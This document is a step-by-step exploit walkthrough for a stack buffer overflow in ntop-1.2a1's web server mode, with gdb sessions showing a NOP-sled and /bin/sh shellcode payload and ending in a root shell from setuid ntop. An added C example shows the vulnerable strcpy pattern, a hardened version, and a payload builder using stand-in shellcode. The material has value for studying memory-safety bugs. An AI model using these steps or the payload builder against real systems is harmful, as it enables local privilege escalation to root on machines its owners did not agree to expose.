1. [on victim host] First modify the ntop-1.2a1 source code so that it runs
   with non-root privileges, and compile it. The changed line is ntop.c:362:

       if((0 && (rFileName == NULL) && (getuid () && geteuid ()) || setuid (0)) ){

2. [on local host] Run "tcpdump -w somefile" to get a tcpdump capture file
   to feed ntop. Copy it to the victim host.

3. [on victim host] Execute the following with our modified ntop:

   $ ./ntop -w 8080 -f somefile
   Warning: unable to read file '.ntop'. No security will be used!
   Waiting for HTTP connections on port 8080...

4. [on victim host] Run gdb, attach to our ntop process, and break at the
   function returnHTTPPage:

   $ gdb ./ntop 2634
   (gdb) break returnHTTPPage
   Breakpoint 1 at 0x8051350
   (gdb) cont
   Continuing.
   [Switching to Thread 28851]

5. [on local host] Execute the exploit against the victim host:

   $ ./ntop-w-exp | nc victim 8080

6. [on victim host] gdb stops at the returnHTTPPage breakpoint. Now set a
   breakpoint on strcpy and continue; gdb will stop at the strcpy
   breakpoint. The value of "dest=0xbefffb00" is the stack location
   (the buffer the request is copied into) that we will use as the esp
   value, i.e. the address the overwritten return address points back
   into. The src argument shows the payload: a run of '\220' (0x90, NOP)
   bytes, the shellcode containing "bin/sh", and the return address
   repeated over and over.

   Breakpoint 1, 0x8051350 in returnHTTPPage ()
   (gdb) break strcpy
   Breakpoint 2 at 0x400c842a: file ../sysdeps/generic/strcpy.c, line 33.
   (gdb) cont
   Continuing.

   Breakpoint 2, strcpy (dest=0xbefffb00 "$ý¡¾±\017\005\b\b", src=0x8091dc1 '\220' , "êÌ037^\211v\b1¿º210F\a\211F\fs.013\211òÌ215N\b\215V\fÌÌ2001ÚÌ211ÙÐÌÌ200èÜmes>bin/sh\030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030ûß½º030"...) at ../sysdeps/generic/strcpy.c:33
   (gdb) cont
   Continuing.

7. [on victim host] Now kill our ntop and run the setuid ntop:

   $ /usr/local/sbin/ntop -w 8080

8. [on local host] Modify the esp value in ntop-w-exp.c and execute the
   exploit. You can set the offset with the first argument to ntop-w-exp.
   I think the offset must be a negative value.

   $ ./ntop-w-exp | nc victim 8080

9. [on victim host] You will get a root shell.
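The following is an added example and is not ntop's source or the ntop-w-exp
exploit. It shows, in C, the unbounded strcpy pattern that steps 4 to 6
exercise, a hardened handler beside it, and the payload layout the strcpy
src argument reveals (NOP sled, shellcode, repeated return address). It also
shows the check a practitioner wants before picking the offset in step 8:
strcpy stops at the first NUL byte, so a return address containing 0x00
(such as the raw dest value 0xbefffb00) truncates the payload, which is one
reason the exact dest value is adjusted by an offset. The function names,
the 256-byte buffer size and the int3 stand-in shellcode are assumptions
made for the example, not values from ntop.

```c
/* Added example, not ntop's source or the ntop-w-exp exploit: the strcpy
 * pattern the advisory exploits, a hardened form, and the payload layout
 * visible in the gdb session. All names and sizes here are illustrative. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PAGE_BUF 256   /* assumed buffer size, not ntop's real one */

/* Vulnerable pattern: request data is copied into a fixed stack buffer
 * with strcpy, so input longer than PAGE_BUF overwrites the saved return
 * address. Kept here only for comparison; call it with short input. */
int return_http_page_vulnerable(const char *request_path) {
    char page[PAGE_BUF];
    strcpy(page, request_path);              /* no length check */
    return (int)strlen(page);
}

/* Hardened form: reject input that does not fit, then copy with a bound. */
int return_http_page_hardened(const char *request_path) {
    char page[PAGE_BUF];
    size_t len = strlen(request_path);
    if (len >= sizeof page)
        return -1;                           /* refuse instead of overflow */
    memcpy(page, request_path, len + 1);
    return (int)len;
}

/* Step 8: the address written over the return slot is the strcpy
 * destination measured in gdb (0xbefffb00 above) plus a signed offset. */
uint32_t target_address(uint32_t strcpy_dest, int offset) {
    return strcpy_dest + (uint32_t)offset;
}

/* Payload layout seen in the strcpy src argument: a sled of 0x90 (NOP)
 * bytes, the shellcode, then the return address repeated so that one copy
 * lands on the saved EIP. Returns the payload length, or -1 if out is
 * too small. */
int build_payload(unsigned char *out, size_t out_size, size_t nop_count,
                  const unsigned char *shellcode, size_t sc_len,
                  uint32_t ret, size_t ret_repeats) {
    size_t total = nop_count + sc_len + 4 * ret_repeats;
    if (total > out_size)
        return -1;
    memset(out, 0x90, nop_count);
    memcpy(out + nop_count, shellcode, sc_len);
    for (size_t i = 0; i < ret_repeats; i++) {
        unsigned char *p = out + nop_count + sc_len + 4 * i;
        p[0] = (unsigned char)(ret & 0xff);          /* little-endian x86 */
        p[1] = (unsigned char)((ret >> 8) & 0xff);
        p[2] = (unsigned char)((ret >> 16) & 0xff);
        p[3] = (unsigned char)((ret >> 24) & 0xff);
    }
    return (int)total;
}

/* strcpy stops at the first NUL byte, so a return address containing 0x00
 * truncates the payload before the repeated addresses reach saved EIP. */
int payload_has_nul(const unsigned char *p, size_t len) {
    return memchr(p, 0, len) != NULL;
}

/* Constructed stand-in shellcode (int3 bytes), not a real /bin/sh payload. */
static const unsigned char demo_shellcode[] = { 0xcc, 0xcc, 0xcc, 0xcc };

/* Build the demo payload for a given return address and report whether
 * strcpy would truncate it: 1 if a NUL is present, 0 if not, -1 on error. */
int demo_payload_truncated(uint32_t ret) {
    unsigned char buf[512];
    int len = build_payload(buf, sizeof buf, 200, demo_shellcode,
                            sizeof demo_shellcode, ret, 8);
    if (len < 0)
        return -1;
    return payload_has_nul(buf, (size_t)len);
}

/* Run the hardened handler against a path of n 'A' bytes (n < 1024). */
int hardened_with_path_length(size_t n) {
    static char path[1024];
    if (n >= sizeof path)
        return -1;
    memset(path, 'A', n);
    path[n] = '\0';
    return return_http_page_hardened(path);
}

int main(void) {
    uint32_t dest = 0xbefffb00u;            /* strcpy dest from the gdb session */
    printf("dest as-is : truncated=%d\n", demo_payload_truncated(dest));
    printf("dest - 16  : truncated=%d (ret=0x%08x)\n",
           demo_payload_truncated(target_address(dest, -16)),
           target_address(dest, -16));
    printf("hardened, 300-byte path: %d\n", hardened_with_path_length(300));
    return 0;
}
```

Running it shows that a payload built around the raw dest value 0xbefffb00
contains a NUL byte and would be cut short by strcpy, while a nearby
address without a 0x00 byte survives intact; the hardened handler simply
refuses a 300-byte path instead of copying it.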